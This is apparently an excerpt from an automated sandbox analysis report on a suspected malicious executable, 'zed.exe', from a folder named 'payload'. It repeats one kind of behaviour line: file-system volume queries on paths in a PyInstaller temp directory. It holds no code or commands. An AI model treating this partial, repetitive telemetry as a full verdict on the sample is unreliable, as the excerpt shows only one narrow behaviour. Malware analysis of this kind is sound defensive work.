Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Util VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\http1.0 VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
